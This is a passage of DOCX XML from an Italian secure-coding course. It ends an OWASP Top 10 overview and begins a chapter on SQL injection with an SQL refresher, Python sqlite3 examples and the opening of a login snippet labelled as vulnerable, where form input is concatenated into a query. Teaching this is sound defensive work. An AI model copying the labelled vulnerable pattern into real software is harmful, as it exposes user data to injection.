        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A01 Broken Access Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è in cima da otto anni. È il problema più diffuso e duraturo della sicurezza applicativa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il corso copre a fondo: Broken Access Control (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> + 10), Cryptographic Failures (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), Injection — SQL e XSS (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> + 8), Software Supply Chain Failures (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Insieme, oltre il 70% delle vulnerabilità reali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-AAAA-NNNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è l’identificatore univoco di una specifica vulnerabilità in un software specifico. Mantenuto da MITRE, consultabile su NVD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(0.0–10.0) è il punteggio standardizzato di gravità di una vulnerabilità. Bande: bassa, media, alta, critica. Versione attuale: 4.0 (la 3.1 è ancora ampiamente in uso).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1090"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esiste anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP API Security Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dedicata alle API REST (vedi </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">-bis).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dalla teoria alla pratica vera. Costruiremo un attacco passo-passo su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, vedremo perché funziona, scriveremo la versione corretta. È il primo dei due capitoli cardine del corso.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="204"/>
    <w:bookmarkEnd w:id="205"/>
    <w:bookmarkStart w:id="248" w:name="capitolo-5-sql-injection"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="495" w:name="ch_5"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 5 — SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="495"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (in particolare le sezioni 3.9–3.11 su database, SQL e sqlite3), </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (cosa è OWASP, in particolare A05 Injection).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Quanto ci vorrà:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3-4 ore se segui il laboratorio. È il primo dei due capitoli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cardine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del corso e merita tutto il tempo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La SQL Injection (in italiano:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">iniezione SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) è la vulnerabilità più antica del web ancora in attività. Documentata per la prima volta nel 1998, è ancora oggi nel 2025 una delle prime cinque cause di breach in produzione. Quasi tutti i grandi disastri informatici che hai sentito nominare — TalkTalk, Sony Pictures, Yahoo, Heartland Payment Systems — hanno coinvolto SQL Injection. È la vulnerabilità che, da sola, ha esposto più dati personali nella storia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ed è anche la vulnerabilità che si previene con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">una singola riga di codice scritta nel modo giusto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Non serve nessuna libreria sofisticata, nessun framework speciale, nessuna conoscenza esoterica: serve solo capire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">come funziona</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e applicare la difesa corretta in modo disciplinato. Per questo è il capitolo più importante con cui aprire un corso di programmazione sicura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="206" w:name="ripasso-espresso-cosè-una-query-sql"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="496" w:name="sec_5_1"/>
      <w:r>
        <w:t xml:space="preserve">5.1 Ripasso espresso: cos’è una query SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="496"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riprendiamo brevemente i concetti del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Salta questa sezione se sei già a tuo agio con SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">query SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un comando in inglese che diciamo al database per leggere, inserire, modificare o cancellare dati. Le quattro forme base:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> colonne </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tabella </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> condizione;       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- LEGGI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tabella (colonne) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VALUES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (valori);      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- CREA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tabella </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> colonna </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> valore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cond;     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- MODIFICA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tabella </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> condizione;               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- CANCELLA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio di query reale: estrarre l’utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con la sua password:</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username, ruolo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utenti</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'mario'</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'segreta123'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se in tabella esiste una riga che corrisponde, il database la restituisce. Se non esiste, restituisce zero righe. Concetto importante:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tutto quello che è racchiuso fra apici singoli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">'...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">è considerato dal database una stringa di dati, non un comando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La parola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dentro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'mario'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un valore. La parola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fuori dagli apici è un comando.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Python col modulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, eseguire una query si fa così:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlite3</w:t>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"banca.db"</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rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT id, username FROM utenti WHERE username='mario'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">risultato </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchall()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esegue la query,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.fetchall()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">legge tutte le righe del risultato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="206"/>
    <w:bookmarkStart w:id="207" w:name="il-problema-in-una-frase"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="497" w:name="sec_5_2"/>
      <w:r>
        <w:t xml:space="preserve">5.2 Il problema in una frase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="497"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tutto il problema della SQL Injection si riassume in una frase:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Il database non sa distinguere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">i tuoi comandi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dati dell’utente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">se li mescoli in un’unica stringa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per il database, una query è solo una stringa di testo. Se quella stringa contiene istruzioni SQL valide, il database le esegue, indipendentemente da chi le abbia scritte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vediamo concretamente cosa succede quando un programmatore costruisce una query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">concatenando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l’input dell’utente. Supponiamo di avere un form di login dove l’utente inserisce username e password, e nel codice scriviamo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># CODICE VULNERABILE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.form.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.form.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
